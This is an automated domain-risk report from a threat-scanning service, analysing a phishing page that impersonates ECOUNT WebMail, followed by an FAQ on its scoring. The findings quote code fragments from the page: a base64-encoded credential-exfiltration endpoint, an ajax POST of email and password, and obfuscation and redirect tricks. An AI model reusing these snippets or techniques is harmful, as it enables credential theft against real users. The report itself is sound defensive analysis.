context safety score
A score of 39/100 indicates multiple risk signals were detected. This entity shows patterns commonly associated with malicious intent.
encoded payload
suspicious base64-like blobs detected in page content
js obfuscation
Obfuscated document.write with encoded content
phishing
Fake ECOUNT WebMail login page hosted on a Cloudflare Workers domain (worker-still-bar-e200.porter-42b.workers.dev) designed to steal user credentials. The page mimics the legitimate ECOUNT WebMail login interface with matching branding, title 'Ecount WebMail - Login', and ECOUNT logo styling. (location: page.html - decoded HTML body, title element and login form)
credential harvesting
Login form POSTs email and password to an external exfiltration endpoint at https://ovalsakal.biz/Count/ecounttele.php using obfuscated field names (u67hy8 for email, pyu787 for password). After one successful capture, the victim is silently redirected to the legitimate ecount.com site to avoid suspicion. (location: page.html - decoded script: $.ajax({url:atob(phpLink), type:'POST', data:{u67hy8: email, pyu787: password}}))
brand impersonation
The page fully impersonates ECOUNT's WebMail service, including the brand name in the title, meta author tag set to 'ECOUNT', login-logo CSS class matching ECOUNT's design system, and a post-capture redirect to https://www.ecount.com/us/ to complete the deception. (location: page.html - decoded HTML: <title>Ecount WebMail - Login</title>, <meta name='author' content='ECOUNT'>, redirect to ecount.com)
obfuscated code
The entire page HTML is hidden inside a JavaScript document.write(unescape(...)) call using percent-encoded characters, making the true content invisible to static scanners and human reviewers inspecting the raw source. Additionally, the credential exfiltration endpoint URL is base64-encoded in a variable named 'phpLink' and decoded at runtime via atob(). (location: page.html lines 1-11: const phpLink = 'aHR0cHM6Ly9vdmFsc2FrYWwuYml6L0NvdW50L2Vjb3VudHRlbGUucGhw' and document.write(unescape('%0A%3C%21...')))
malicious redirect
After harvesting credentials on the first login attempt, the script redirects the victim to https://www.ecount.com/us/?redir= — the legitimate ECOUNT site — to make the phishing attack appear as a benign login failure and prevent the victim from realising their credentials were stolen. (location: page.html - decoded script: 2===e ? location.href='https://www.ecount.com/us/?redir=' : (show error, reset))
hidden content
The actual phishing page content (full HTML with login form, styles, and credential-harvesting scripts) is entirely hidden from raw HTML inspection by being URL-percent-encoded and injected at runtime via document.write(unescape(...)). The visible source contains no readable page content, preventing detection by content-based security tools. (location: page.html - entire page body encoded as percent-escaped string inside unescape() call)
social engineering
The autocomplete attributes on the email and password fields are set to random garbage strings ('hdyiehge' and 'hdyyefguei') to suppress browser-saved credential autofill warnings, and the URL fragment (#hash) is used to pre-populate the email field — a technique used in targeted spear-phishing emails where the victim's email is embedded in the link. (location: page.html - decoded HTML: autocomplete='hdyiehge', autocomplete='hdyyefguei'; decoded script: a(g) ? $('#email').val(g) using window.location.hash)
curl https://api.brin.sh/domain/worker-still-bar-e200.porter-42b.workers.dev
Common questions teams ask before deciding whether to use this domain in agent workflows.
worker-still-bar-e200.porter-42b.workers.dev currently scores 39/100 with a suspicious verdict and low confidence. The goal is to protect agents from high-risk context before they act on it. Treat this as a decision signal: higher scores suggest lower observed risk, while lower scores mean you should add review or block this domain.
Use the score as a policy threshold: 80–100 is safe, 50–79 is caution, 20–49 is suspicious, and 0–19 is dangerous. Teams often auto-allow safe, require human review for caution/suspicious, and block dangerous.
brin evaluates four dimensions: identity (source trust), behavior (runtime patterns), content (malicious instructions), and graph (relationship risk). Analysis runs in tiers: static signals, deterministic pattern checks, then AI semantic analysis when needed.
Identity checks source trust, behavior checks unusual runtime patterns, content checks for malicious instructions, and graph checks risky relationships to other entities. Looking at sub-scores helps you understand why an entity passed or failed.
brin performs risk assessments on external context before it reaches an AI agent. It scores that context for threats like prompt injection, hijacking, credential harvesting, and supply chain attacks, so teams can decide whether to block, review, or proceed safely.
No. A safe verdict means no significant risk signals were detected in this scan. It is not a formal guarantee; assessments are automated and point-in-time, so combine scores with your own controls and periodic re-checks.
Re-check before high-impact actions such as installs, upgrades, connecting MCP servers, executing remote code, or granting secrets. Use the API in CI or runtime gates so decisions are based on the latest scan.
Learn more in threat detection docs, how scoring works, and the API overview.
Assessments are automated and may contain errors. Findings are risk indicators, not confirmed threats. This is a point-in-time assessment; security posture can change.